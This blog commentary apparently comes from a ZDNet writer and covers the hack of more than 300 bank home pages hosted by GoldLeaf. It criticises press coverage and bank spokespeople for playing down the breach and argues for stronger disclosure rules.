The mainstream press is beginning to pick up on a major breach to the banking system that has so far gone under-reported. Fellow blogger George Ou and I gave the story the attention it deserved:
- George Ou: 300+ Bank homepages hacked and redirected!
- David Berlind: Massive, under-reported online banking breach raises serious disclosure and remedy questions.
Now, some local papers in communities whose banks were affected are reporting the story. But judging by the coverage, the organizations that are best served by downplaying the problem -- the banks and the breached service provider they depend on for home page services (GoldLeaf) -- are doing a good job controlling the message. In his story in the Lincoln, Nebraska-based Lincoln Journal Star, Richard Piersol does a great job reporting on the situation. He quotes ZDNet and I want to thank him for the pointers and for giving the attention to the disclosure issue that he did. Too bad more papers, including some national ones, haven't picked up on the need to do this. Had I, as someone with a trained eye for technical BS, been a fly on the wall with Piersol as he interviewed various sources for his stories, there are a few opportunities that I might have siezed like a pitbull.
Piersol reports that there's some debate as to whether the intrusion in question meets the defintion for phishing. Wrote Piersol:
It's sort of like "phishing," the use of a falsely familiar front, usually using email, to get unwitting people to hand over valuable information. There is some debate about whether this incident met the "phishing" definition, because it was an invasion of servers, rather than an email enticement.
There's actually no debate as to whether this incident involved phishing or not. As in "fishing for clues," phishing involves hackers who cast their line, hook, and bait into a pool of email recipients with a bogus message indicating that some action on their account is required. In contrast, the Goldleaf intrusion involved the hacking of bank home pages that bank customers were visting of their own volition. No one tricked them into trying to do their online banking. With phishing, there are best practices that all Internet e-mail users should follow to avoid becoming victims. With hacks of supposedly legitimate home pages, there are none.
In characterizing the odds that someone passed their online banking credentials to the hackers, Piersol quotes Goldleaf spokesman Scott Meyeroff as saying "My guess is someone out there, someone did it, even though they’re told not to." Told not to do what? Under what circumstances would most depositors (some techies might be able to spot suspicious activity) visit a bank's home page of their own volition and not follow whatever process that home page sends them too? Bear in mind that the fix for some banks, as of my last report, was to send depositors to a URL that was outside the banks' domains.
As in my initial coverage, this reeks of blame deflection. If it's successfully characterized as a phishing scam, then the targeted institutions can be absolved of blame since successful phishing exploits are never the fault of those institutions. Never. It's like counterfeit money. If you unknowingly take receipt of a countefeit bill in your change at Starbucks and then try to use that bill in your next transaction, it's not the Federal Reserve's fault. Furthermore, if your a banker in this situation and you can sneak in a comment about how users may have engaged in behavior that they shouldn't have, now, you're even further distancing yourself from accountability. This isn't just lack of accountability. This is insulting to the intelligence of depositors.
Meyeroff further downplayed the nature of the incident by pointing out that the hack was "non-transactional" in nature. Backed up by quotes from banks like there was absolutely no loss and no fraudulent activity," this comes across as though there was minimal risk. Even more worrisome is a quote from Meyeroff where his says the authorities and banking regulators "haven't reviewed this as a material incident" because of the non-transactional nature.
I'm not suggesting that Goldleaf and its customers (the banks) conspired with prepared language designed to snuff out a public relations nightmare. But Goldleaf and its banks are the ones who can least afford that nightmare. One really important job of bankers is to maintain the public's confidence in the integrity of the banking system. I've interviewed overseers of state banking systems who've told me this point blank. So, as long as they're not under oath at some hearing, should we really expect a banker to say anything that might undermine that confidence. Of course not.
It's not a "material incident?" Puh-leeze. Hackers break the home page of more than 300 banks in a way that could cause depositors to unwittingly hand their banking credentials to hackers in Madrid and the bankers and the authorities think this is non-material? What are these people smoking?
This is exactly the reason why, if there are going to be regulations regarding disclosure and remedy in compromises of anything remotely personally identified, whether transactional or not, that those regulations need the sort of teeth that force rigorous disclosure and transparent review. Anything less, and the organizations being regulated will think they can get away with murder, and will.